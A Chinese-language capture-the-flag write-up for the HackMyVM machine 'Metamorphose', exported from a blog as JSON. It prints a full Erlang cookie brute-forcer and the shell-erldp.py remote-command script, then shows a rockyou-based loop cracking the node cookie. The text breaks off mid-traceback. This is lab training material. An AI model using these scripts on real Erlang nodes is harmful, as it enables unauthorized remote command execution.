{"id":769,"date":"2024-08-06T00:59:55","date_gmt":"2024-08-05T16:59:55","guid":{"rendered":"http:\/\/162.14.82.114\/?p=769"},"modified":"2024-08-06T00:59:55","modified_gmt":"2024-08-05T16:59:55","slug":"hmv-_-metamorphose","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/769\/08\/06\/2024\/","title":{"rendered":"hmv[-_-]Metamorphose"},"content":{"rendered":"<h1>Metamorphose<\/h1>\n<blockquote>\n<p>\u8fd9\u4e2a\u9776\u673a\u5f88\u96be\uff0c\u7fa4\u91cc\u7684\u5e08\u5085\u4e5f\u641e\u4e86\u5f88\u957f\u65f6\u95f4\uff0c\u53ef\u60dc\u8fdb\u5c55\u90fd\u4e0d\u5927\uff0c\u4e0b\u8f7d\u4e0b\u6765\u770b\u4e00\u4e0b\u54c8\uff01<\/p>\n<\/blockquote>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058520.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058520.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240803233432197\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058522.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058522.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240804002813149\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<blockquote>\n<p>&quot;Metamorphose&quot; \u662f\u4e00\u4e2a\u6e90\u81ea\u5e0c\u814a\u8bed\u7684\u82f1\u8bed\u8bcd\u6c47\uff0c\u610f\u601d\u662f\u7ecf\u5386\u5f7b\u5e95\u7684\u53d8\u5316\u6216\u8f6c\u53d8\uff0c\u901a\u5e38\u662f\u4ece\u4e00\u79cd\u5f62\u6001\u53d8\u4e3a\u53e6\u4e00\u79cd\u5f62\u6001\u3002\u8fd9\u4e2a\u8bcd\u5e38\u7528\u6765\u63cf\u8ff0\u751f\u7269\u4e0a\u7684\u53d8\u5316\uff0c\u6bd4\u5982\u6606\u866b\u4ece\u5e7c\u866b\u53d8\u6210\u6210\u866b\u7684\u8fc7\u7a0b\uff08\u4f8b\u5982\u6bdb\u6bdb\u866b\u53d8\u8774\u8776\uff09\u3002\u5728\u66f4\u5e7f\u6cdb\u7684\u4e0a\u4e0b\u6587\u4e2d\uff0c\u5b83\u53ef\u4ee5\u6307\u4efb\u4f55\u4e8b\u7269\u7684\u6839\u672c\u6027\u6539\u53d8\uff0c\u5305\u62ec\u62bd\u8c61\u6982\u5ff5\u6216\u60c5\u51b5\u7684\u53d8\u5316\u3002<\/p>\n<p>\u4f8b\u5982\uff1a<\/p>\n<ul>\n<li>\u751f\u7269\u5b66\u4e2d\u7684\u53d8\u6001\u53d1\u80b2\u8fc7\u7a0b\u3002<\/li>\n<li>\u4e00\u4e2a\u4eba\u6216\u7ec4\u7ec7\u7ecf\u5386\u4e86\u91cd\u5927\u8f6c\u53d8\u540e\u7684\u7ed3\u679c\u3002<\/li>\n<li>\u6587\u5b66\u4f5c\u54c1\u4e2d\u4eba\u7269\u5f62\u8c61\u7684\u8f6c\u53d8\u3002<\/li>\n<\/ul>\n<\/blockquote>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ rustscan -a $IP -- -sCV                                                                             \n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 172.20.10.3:22\nOpen 172.20.10.3:4369\nOpen 172.20.10.3:32837\n[~] Starting Script(s)\n[&gt;] Script to be run Some(&quot;nmap -vvv -p {{port}} {{ip}}&quot;)\n\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-08-03 12:29 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 12:29\nCompleted NSE at 12:29, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 12:29\nCompleted NSE at 12:29, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 12:29\nCompleted NSE at 12:29, 0.00s elapsed\nInitiating Ping Scan at 12:29\nScanning 172.20.10.3 [2 ports]\nCompleted Ping Scan at 12:29, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 12:29\nCompleted Parallel DNS resolution of 1 host. at 12:29, 0.00s elapsed\nDNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 12:29\nScanning 172.20.10.3 [3 ports]\nDiscovered open port 22\/tcp on 172.20.10.3\nDiscovered open port 32837\/tcp on 172.20.10.3\nDiscovered open port 4369\/tcp on 172.20.10.3\nCompleted Connect Scan at 12:29, 0.00s elapsed (3 total ports)\nInitiating Service scan at 12:29\nScanning 3 services on 172.20.10.3\nCompleted Service scan at 12:31, 126.23s elapsed (3 services on 1 host)\nNSE: Script scanning 172.20.10.3.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 12:31\nCompleted NSE at 12:31, 14.02s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 12:31\nCompleted NSE at 12:31, 1.01s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 12:31\nCompleted NSE at 12:31, 0.00s elapsed\nNmap scan report for 172.20.10.3\nHost is up, received conn-refused (0.0011s latency).\nScanned at 2024-08-03 12:29:34 EDT for 142s\n\nPORT      STATE SERVICE REASON  VERSION\n22\/tcp    open  ssh     syn-ack OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)\n| ssh-hostkey: \n|   256 a6:af:c3:72:91:52:e9:4d:e5:c7:7e:99:bd:15:97:fd (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCBB+SGPU+Ekda80jLZ2gWo+zrdeZoEH0HtLz8vzI+iWYhXzWkEZlkemG4xonvYNV7ykMFbwXnNf+l0mBrttDxQ=\n|   256 d8:77:85:74:f5:95:3d:0e:04:78:7d:f2:47:01:f9:98 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHvrpQCogggApAEo48N0LAdvWpL4wgAgR\/zqGJ8MA7YC\n4369\/tcp  open  epmd    syn-ack Erlang Port Mapper Daemon\n| epmd-info: \n|   epmd_port: 4369\n|   nodes: \n|_    network: 32837\n32837\/tcp open  unknown syn-ack\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 12:31\nCompleted NSE at 12:31, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 12:31\nCompleted NSE at 12:31, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 12:31\nCompleted NSE at 12:31, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 142.35 seconds<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u811a\u672c\u5229\u7528\uff08\u5305\u542b\u8bd5\u9519\uff09<\/h3>\n<p>\u53c2\u8003 <a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/4369-pentesting-erlang-port-mapper-daemon-epmd\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/4369-pentesting-erlang-port-mapper-daemon-epmd<\/a><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ echo -n -e &quot;\\x00\\x01\\x6e&quot; | nc -vn $IP 4369 \n(UNKNOWN) [172.20.10.3] 4369 (epmd) open\nname network at port 32837\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ nmap -sV -Pn -n -T4 -p 4369 --script epmd-info $IP \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-08-03 12:42 EDT\nNmap scan report for 172.20.10.3\nHost is up (0.0011s latency).\n\nPORT     STATE SERVICE VERSION\n4369\/tcp open  epmd    Erlang Port Mapper Daemon\n| epmd-info: \n|   epmd_port: 4369\n|   nodes: \n|_    network: 32837\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 6.21 seconds\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ nmap -sCV -p- $IP                                 \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-08-03 12:44 EDT\nStats: 0:00:56 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan\nService scan Timing: About 66.67% done; ETC: 12:45 (0:00:20 remaining)\nNmap scan report for 172.20.10.3\nHost is up (0.0021s latency).\nNot shown: 65532 closed tcp ports (conn-refused)\nPORT      STATE SERVICE VERSION\n22\/tcp    open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)\n| ssh-hostkey: \n|   256 a6:af:c3:72:91:52:e9:4d:e5:c7:7e:99:bd:15:97:fd (ECDSA)\n|_  256 d8:77:85:74:f5:95:3d:0e:04:78:7d:f2:47:01:f9:98 (ED25519)\n4369\/tcp  open  epmd    Erlang Port Mapper Daemon\n| epmd-info: \n|   epmd_port: 4369\n|   nodes: \n|_    network: 32837\n32837\/tcp open  unknown\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<p>\u7ee7\u7eed\u641c\u96c6\u4fe1\u606f\uff1a<a href=\"https:\/\/github.com\/gteissier\/erl-matter\">https:\/\/github.com\/gteissier\/erl-matter<\/a><\/p>\n<p>\u53d1\u73b0\u8fd9\u4e2acookie\u6709\u8ff9\u53ef\u5faa\u7684\uff0c\u5c1d\u8bd5\u5bfb\u627e\u73b0\u6210\u7684\u89e3\u51b3\u65b9\u6848\uff1a<a href=\"https:\/\/insinuator.net\/2017\/10\/erlang-distribution-rce-and-a-cookie-bruteforcer\/\">https:\/\/insinuator.net\/2017\/10\/erlang-distribution-rce-and-a-cookie-bruteforcer\/<\/a><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ ls    \nepmd_bf  erldp-info.nse  wget-log\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ cd epmd_bf          \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/epmd_bf]\n\u2514\u2500$ ls\nebin  Emakefile  Makefile  priv  src\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/epmd_bf]\n\u2514\u2500$ cat src\/epmd_bf.erl   \n%  epmd_bf.erl\n%  \n%  Copyright 2017 Daniel Mende &lt;mail@c0decafe.de&gt;\n%  \n%  Redistribution and use in source and binary forms, with or without\n%  modification, are permitted provided that the following conditions are\n%  met:\n%  \n%  * Redistributions of source code must retain the above copyright\n%    notice, this list of conditions and the following disclaimer.\n%  * Redistributions in binary form must reproduce the above\n%    copyright notice, this list of conditions and the following disclaimer\n%    in the documentation and\/or other materials provided with the\n%    distribution.\n%  * Neither the name of the  nor the names of its\n%    contributors may be used to endorse or promote products derived from\n%    this software without specific prior written permission.\n%  \n%  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n%  &quot;AS IS&quot; AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n%  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n%  A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n%  OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n%  SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n%  LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n%  DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n%  THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n%  (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n%  OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n-module(epmd_bf).\n-author(&#039;Daniel Mende &lt;mail@c0decafe.de&gt;&#039;).\n-compile(export_all).\n\n-include_lib(&quot;kernel\/include\/dist.hrl&quot;).\n\nget_next(_, [_|[]]) -&gt;\n    stop;\nget_next(Cur, [H|T]) -&gt;\n    if\n        Cur == H -&gt;\n            lists:nth(1, T);\n        true -&gt;\n            get_next(Cur, T)\n    end.\n\nnext([], Alphabet) -&gt;\n    lists:nth(1, Alphabet);\nnext([H|T], Alphabet) -&gt;\n    case get_next(H, Alphabet) of\n        stop -&gt;\n            [lists:nth(1, Alphabet) | next(T, Alphabet)];\n        Next -&gt;\n            [Next | T]\n    end.\n\ngen_digest(Challenge, Cookie) when is_integer(Challenge), is_list(Cookie) -&gt;\n    erlang:md5([list_to_binary(Cookie)|integer_to_list(Challenge)]).\n\ntest_cookie({IP, Port}, Cookie) -&gt;\n    test_cookie({IP, Port}, Cookie, &lt;&lt;&quot;epmd_bf@baldr.local&quot;&gt;&gt;).\ntest_cookie({IP, Port}, Cookie, NodeName) -&gt;\n    io:fwrite(&quot;Testing cookie ~s~n&quot;, [Cookie]),\n    {ok, Socket} = gen_tcp:connect(IP, Port, [\n            {packet, 2},\n            {active, true},\n            {nodelay, true},\n            {reuseaddr, true},\n            binary\n        ]),\n    Identification = &lt;&lt;\n        &quot;n&quot;,\n        0,5,            % Version\n        0,7,127,253,    % Flags\n        NodeName\/bytes  % NodeName\n    &gt;&gt;,\n    ok = gen_tcp:send(Socket, Identification),\n    receive\n        {tcp, _, &lt;&lt;&quot;sok&quot;&gt;&gt;} -&gt; \n            receive \n                {tcp, _, &lt;&lt;&quot;n&quot;, _Version:16, _Flags:32, Challenge:32, Name\/binary&gt;&gt;} -&gt; \n                    %~ io:fwrite(&quot;Received Challenge ~p from ~s~n&quot;, [Challenge, Name]),\n                    Digest = gen_digest(Challenge, Cookie),\n                    ChallengeReply = &lt;&lt;\n                        &quot;r&quot;,\n                        0,0,0,0,    % Challenge\n                        Digest\/bytes\n                    &gt;&gt;,\n                    ok = gen_tcp:send(Socket, ChallengeReply),\n                    receive\n                        {tcp_closed, _} -&gt;\n                            failed;\n                        {tcp, _, &lt;&lt;&quot;a&quot;, _\/binary&gt;&gt;} -&gt;\n                            io:fwrite(&quot;Found cookie ~s for host ~s~n&quot;, [Cookie, Name]),\n                            success;\n                        Ret -&gt;                            \n                            io:fwrite(&quot;Received ~p~n&quot;, [Ret]),\n                            error\n                    end;\n                Ret -&gt;\n                    io:fwrite(&quot;Received ~p~n&quot;, [Ret]),\n                    error\n                end;\n        _ -&gt; error\n    end.\n\ngen_first(N, Alphabet) -&gt;\n    gen_first(N, N, Alphabet).\ngen_first(_, 0, _) -&gt;\n    [];\ngen_first(N, C, Alphabet) -&gt;\n    [lists:nth(1, Alphabet) | gen_first(N, C-1, Alphabet)].\n\nbf_cookie({IP, Port}, Alphabet, Cookie) -&gt;\n    case test_cookie({IP, Port}, Cookie) of\n        success -&gt; \n            stop;\n        failed -&gt;\n            bf_cookie({IP, Port}, Alphabet, next(Cookie, Alphabet));\n        _ -&gt;\n            stop\n    end.\n\ntest() -&gt;\n    Alphabet = lists:seq($A,$Z),\n    bf_cookie({{127,0,0,1}, 37453}, Alphabet, gen_first(20, Alphabet)).\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/epmd_bf]\n\u2514\u2500$ vim src\/epmd_bf.erl\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/epmd_bf]\n\u2514\u2500$ tail src\/epmd_bf.erl \n            stop;\n        failed -&gt;\n            bf_cookie({IP, Port}, Alphabet, next(Cookie, Alphabet));\n        _ -&gt;\n            stop\n    end.\n\ntest() -&gt;\n    Alphabet = lists:seq($A,$Z),\n    bf_cookie({{172.20.10.3}, 32837}, Alphabet, gen_first(20, Alphabet)).<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff0c\u4f46\u662f\u4e0d\u884c\uff0c\u6362\u4e00\u4e2a\u8bd5\u8bd5\uff1a<\/p>\n<pre><code class=\"language-bash\">time .\/bruteforce-erldp --threads=16 --seed-start=381410768 --seed-end=386584488 --gap=1000 17 32837<\/code><\/pre>\n<p>\u4e0d\u884c\uff0c\u540e\u6765\u522b\u7684\u5e08\u5085\u51fawp\u4e86\uff0c\u53d1\u73b0\u4e0d\u662f\u7528\u7684\u8fd9\u4e2a\u811a\u672c\uff0c\u662f\u5bf9cookie\u8fdb\u884c\u4e86\u4e00\u4e2a\u7206\u7834\u3002\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/erl-matter]\n\u2514\u2500$ ls    \nbarrier.c           bruteforce-erldp.py   crack-hash    crack-prng.o           erldp.c         erldp.py           jsmn.h          __pycache__            shell-erldp.py\nbin-seeds.py        complete-cookie       crack-hash.c  dictionary-erldp.py    erldp.h         erldp-warning.png  jsmn.o          README.md              sweep-default-cookie.py\nbruteforce-erldp    complete-cookie.c     crack-hash.o  Docker-experiments.md  erldp-info.nse  example.dist       leaked-cookies  revert-prng.sage\nbruteforce-erldp.c  complete-cookie.o     crack-prng    Dockerfile.erlang      erldp.o         Internet-scan.md   LICENSE         sample-cookies\nbruteforce-erldp.o  complete-cookie.sage  crack-prng.c  erlang.py              erldp-proxy.py  jsmn.c             Makefile        seed-distribution.png\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/erl-matter]\n\u2514\u2500$ head -n 20 leaked-cookies\n\n111222333\n123456\n3ren\n588a30cfed89e04a2f1f6f3a8d63f94e\nABCD\nABCEDEF\nAFRTY12ESS3412735ASDF12378\nC00KI3\nC00KIE\nCOOKIE\nClueCon\nCopSeesIt\nDJQWUOCYZCIZNETCXWES\nFOOBAR\nJL0{%8cFLJ{IUr?QC{dOvS]yB%fqSUewy!FTu;_HAB0b`5r;o(KgP,5;y8QF2&gt;ZT\nNDZZKSSLLQEPDAGPLIGG\nODEzMTBlZjc5ZGY5NzQwYTM3ZDkwMzEx\nOMNOMNOM\nSFEWRG34AFDSGAFG35235\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/erl-matter]\n\u2514\u2500$ cat shell-erldp.py    \n#!\/usr\/bin\/env python2\n\nfrom struct import pack, unpack\nfrom cStringIO import StringIO\nfrom socket import socket, AF_INET, SOCK_STREAM, SHUT_RDWR\nfrom hashlib import md5\nfrom binascii import hexlify, unhexlify\nfrom random import choice\nfrom string import ascii_uppercase\nimport sys\nimport argparse\nimport erlang as erl\n\ndef rand_id(n=6):\n  return &#039;&#039;.join([choice(ascii_uppercase) for c in range(n)]) + &#039;@nowhere&#039;\n\nparser = argparse.ArgumentParser(description=&#039;Execute shell command through Erlang distribution protocol&#039;)\n\nparser.add_argument(&#039;target&#039;, action=&#039;store&#039;, type=str, help=&#039;Erlang node address or FQDN&#039;)\nparser.add_argument(&#039;port&#039;, action=&#039;store&#039;, type=int, help=&#039;Erlang node TCP port&#039;)\nparser.add_argument(&#039;cookie&#039;, action=&#039;store&#039;, type=str, help=&#039;Erlang cookie&#039;)\nparser.add_argument(&#039;--verbose&#039;, action=&#039;store_true&#039;, help=&#039;Output decode Erlang binary term format received&#039;)\nparser.add_argument(&#039;--challenge&#039;, type=int, default=0, help=&#039;Set client challenge value&#039;)\nparser.add_argument(&#039;cmd&#039;, default=None, nargs=&#039;?&#039;, action=&#039;store&#039;, type=str, help=&#039;Shell command to execute, defaults to interactive shell&#039;)\n\nargs = parser.parse_args()\n\nname = rand_id()\n\nsock = socket(AF_INET, SOCK_STREAM, 0)\nassert(sock)\n\nsock.connect((args.target, args.port))\n\ndef send_name(name):\n  FLAGS = (\n    0x7499c +\n    0x01000600 # HANDSHAKE_23|BIT_BINARIES|EXPORT_PTR_TAG\n  )\n  return pack(&#039;!HcQIH&#039;, 15 + len(name), &#039;N&#039;, FLAGS, 0xdeadbeef, len(name)) + name\n\nsock.sendall(send_name(name))\n\ndata = sock.recv(5)\nassert(data == &#039;\\x00\\x03\\x73\\x6f\\x6b&#039;)\n\ndata = sock.recv(4096)\n(length, tag, flags, challenge, creation, nlen) = unpack(&#039;!HcQIIH&#039;, data[:21])\nassert(tag == &#039;N&#039;)\nassert(nlen + 19 == length)\nchallenge = &#039;%u&#039; % challenge\n\ndef send_challenge_reply(cookie, challenge):\n  m = md5()\n  m.update(cookie)\n  m.update(challenge)\n  response = m.digest()\n  return pack(&#039;!HcI&#039;, len(response)+5, &#039;r&#039;, args.challenge) + response\n\nsock.sendall(send_challenge_reply(args.cookie, challenge))\n\ndata = sock.recv(3)\nif len(data) == 0:\n  print(&#039;wrong cookie, auth unsuccessful&#039;)\n  sys.exit(1)\nelse:\n  assert(data == &#039;\\x00\\x11\\x61&#039;)\n  digest = sock.recv(16)\n  assert(len(digest) == 16)\n\nprint(&#039;[*] authenticated onto victim&#039;)\n\n# Once connected, protocol between us and victim is described\n# at http:\/\/erlang.org\/doc\/apps\/erts\/erl_dist_protocol.html#protocol-between-connected-nodes\n# it is roughly a variant of erlang binary term format\n# the format also depends on the version of ERTS post (incl.) or pre 5.7.2\n# the format used here is based on pre 5.7.2, the old one\n\ndef erl_dist_recv(f):\n  hdr = f.recv(4)\n  if len(hdr) != 4: return\n  (length,) = unpack(&#039;!I&#039;, hdr)\n  data = f.recv(length)\n  if len(data) != length: return\n\n  # remove 0x70 from head of stream\n  data = data[1:]\n\n  while data:\n    (parsed, term) = erl.binary_to_term(data)\n    if parsed &lt;= 0:\n      print(&#039;failed to parse erlang term, may need to peek into it&#039;)\n      break\n\n    yield term\n\n    data = data[parsed:]\n\ndef encode_string(name, type=0x64):\n  return pack(&#039;!BH&#039;, type, len(name)) + name\n\ndef send_cmd_old(name, cmd):\n  data = (unhexlify(&#039;70836804610667&#039;) + \n    encode_string(name) + \n    unhexlify(&#039;0000000300000000006400006400037265&#039;) +\n    unhexlify(&#039;7883680267&#039;) + \n    encode_string(name) + \n    unhexlify(&#039;0000000300000000006805&#039;) +\n    encode_string(&#039;call&#039;) +\n    encode_string(&#039;os&#039;) +\n    encode_string(&#039;cmd&#039;) +\n    unhexlify(&#039;6c00000001&#039;) + \n    encode_string(cmd, 0x6b) + \n    unhexlify(&#039;6a&#039;) + \n    encode_string(&#039;user&#039;))\n\n  return pack(&#039;!I&#039;, len(data)) + data\n\ndef send_cmd(name, cmd):\n  # REG_SEND control message\n  ctrl_msg = (6,\n    erl.OtpErlangPid(erl.OtpErlangAtom(name),&#039;\\x00\\x00\\x00\\x03&#039;,&#039;\\x00\\x00\\x00\\x00&#039;,&#039;\\x00&#039;),\n    erl.OtpErlangAtom(&#039;&#039;),\n    erl.OtpErlangAtom(&#039;rex&#039;))\n  msg = (\n    erl.OtpErlangPid(erl.OtpErlangAtom(name),&#039;\\x00\\x00\\x00\\x03&#039;,&#039;\\x00\\x00\\x00\\x00&#039;,&#039;\\x00&#039;),\n    (\n      erl.OtpErlangAtom(&#039;call&#039;),\n      erl.OtpErlangAtom(&#039;os&#039;),\n      erl.OtpErlangAtom(&#039;cmd&#039;),\n      [cmd],\n      erl.OtpErlangAtom(&#039;user&#039;)\n    ))\n\n  new_data = &#039;\\x70&#039; + erl.term_to_binary(ctrl_msg) + erl.term_to_binary(msg)\n\n  return pack(&#039;!I&#039;, len(new_data)) + new_data\n\ndef recv_reply(f):\n  terms = [t for t in erl_dist_recv(f)]\n  if args.verbose:\n    print(&#039;\\nreceived %r&#039; % (terms))\n\n  assert(len(terms) == 2)\n  answer = terms[1]\n  assert(len(answer) == 2)\n  return answer[1]\n\nif not args.cmd:\n  while True:\n    try:\n      cmd = raw_input(&#039;%s:%d $ &#039; % (args.target, args.port))\n    except EOFError:\n      print(&#039;&#039;)\n      break\n\n    sock.sendall(send_cmd(name, cmd))\n\n    reply = recv_reply(sock)\n    sys.stdout.write(reply)\nelse:\n  sock.sendall(send_cmd(name, args.cmd))\n\n  reply = recv_reply(sock)\n  sys.stdout.write(reply)\n\nprint(&#039;[*] disconnecting from victim&#039;)\nsock.close()\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/erl-matter]\n\u2514\u2500$ python2 shell-erldp.py\nusage: shell-erldp.py [-h] [--verbose] [--challenge CHALLENGE]\n                      target port cookie [cmd]\nshell-erldp.py: error: too few arguments\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/erl-matter]\n\u2514\u2500$ echo -n -e &quot;\\x00\\x01\\x6e&quot; | nc -vn $IP 4369\n(UNKNOWN) [172.20.10.3] 4369 (epmd) open\nname network at port 40121<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\uff0c\u5c1d\u8bd5\u4e86\u81ea\u5e26\u7684\u5f31\u5bc6\u7801\u4f46\u662f\u4e0d\u884c\uff0c\u5c1d\u8bd5\u4e00\u4e0brockyou\u7684\u524d\u4e00\u5343\u4e2a\u5b57\u5178\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/erl-matter]\n\u2514\u2500$ head -n 1000 \/usr\/share\/wordlists\/rockyou.txt &gt; rockyou_top1000.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/erl-matter]\n\u2514\u2500$ for i in $(cat .\/rockyou_top1000.txt); do if ! python2 shell-erldp.py 172.20.10.3 40121 &quot;$i&quot; whoami 2&gt;&amp;1 | grep -q &quot;wrong cookie, auth unsuccessful&quot;; then echo &quot;[+] cookie:$i&quot;; break; fi; done\n[+] cookie:batman<\/code><\/pre>\n<p>\u627e\u5230\u4e86cookie\uff0c\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/erl-matter]\n\u2514\u2500$ python2 shell-erldp.py 172.20.10.3 40121 batman whoami \n[*] authenticated onto victim\nTraceback (most recent call last):\n  File 